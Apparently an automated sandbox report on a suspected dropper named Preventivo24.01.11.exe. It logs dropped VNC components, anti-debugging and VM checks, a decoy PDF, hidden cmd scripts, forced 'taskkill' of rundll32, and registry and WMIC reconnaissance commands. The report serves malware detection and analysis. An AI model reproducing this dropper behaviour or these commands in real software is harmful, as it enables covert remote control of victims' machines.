Source: C:\Games\taskhost.exe	Code function: 41_2_000C7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,	41_2_000C7AE0
Source: C:\Games\taskhost.exe	Code function: 41_2_000D37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC,	41_2_000D37A0

Source: C:\Games\viewer.exe

Code function: 6_2_00633D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00633D28

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Games\viewer.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Games\taskhost.exe

Code function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle,

41_2_000C57B0

Source: C:\Windows\System32\conhost.exe

Window / User API: threadDelayed 402

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6E82.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	Jump to dropped file

Source: C:\Games\taskhost.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Games\viewer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-60273

Source: C:\Games\viewer.exe

API coverage: 5.2 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 8544	Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8964	Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9112	Thread sleep count: 171 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8212	Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8260	Thread sleep count: 166 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,	0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,	0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,	0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,	0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE3210 FindFirstFileW,FindClose,	0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,	0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3C10 FindFirstFileW,FindClose,	0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,	0_2_00FCBFF0
Source: C:\Games\taskhost.exe	Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,	41_2_000BEC90

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

0_2_00FF2400

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_01087833 VirtualQuery,GetSystemInfo,

0_2_01087833

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\	Jump to behavior

Source: viewer.exe, 0000002A.00000002.1871973925.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWCZ
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: , (Hyper-V Server)
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0108F843

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF6910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,

0_2_00FF6910

Source: C:\Games\taskhost.exe

41_2_000C57B0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00FC0CA0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108A1CE mov esi, dword ptr fs:[00000030h]	0_2_0108A1CE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010A4796 mov eax, dword ptr fs:[00000030h]	0_2_010A4796
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010A47DA mov eax, dword ptr fs:[00000030h]	0_2_010A47DA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01095EA4 mov ecx, dword ptr fs:[00000030h]	0_2_01095EA4
Source: C:\Games\viewer.exe	Code function: 6_2_0064B9CA mov eax, dword ptr fs:[00000030h]	6_2_0064B9CA
Source: C:\Games\viewer.exe	Code function: 6_2_00643C84 mov eax, dword ptr fs:[00000030h]	6_2_00643C84
Source: C:\Games\taskhost.exe	Code function: 41_2_001DC838 mov eax, dword ptr fs:[00000030h]	41_2_001DC838
Source: C:\Games\taskhost.exe	Code function: 41_2_001CD615 mov ecx, dword ptr fs:[00000030h]	41_2_001CD615
Source: C:\Games\taskhost.exe	Code function: 41_2_001DC7F4 mov eax, dword ptr fs:[00000030h]	41_2_001DC7F4

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_0108A23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

0_2_0108A23A

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EC2520 __set_se_translator,SetUnhandledExceptionFilter,	0_2_00EC2520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108ACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0108ACAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EC5180 __set_se_translator,SetUnhandledExceptionFilter,	0_2_00EC5180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0108F843
Source: C:\Games\viewer.exe	Code function: 6_2_00635248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00635248
Source: C:\Games\viewer.exe	Code function: 6_2_00639256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00639256
Source: C:\Games\viewer.exe	Code function: 6_2_006353DE SetUnhandledExceptionFilter,	6_2_006353DE
Source: C:\Games\viewer.exe	Code function: 6_2_006347F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_006347F5
Source: C:\Games\taskhost.exe	Code function: 41_2_001BC87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_001BC87C
Source: C:\Games\taskhost.exe	Code function: 41_2_001B8A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_001B8A67

Source: C:\Games\viewer.exe

Code function: 6_2_00615210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop,

6_2_00615210

Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
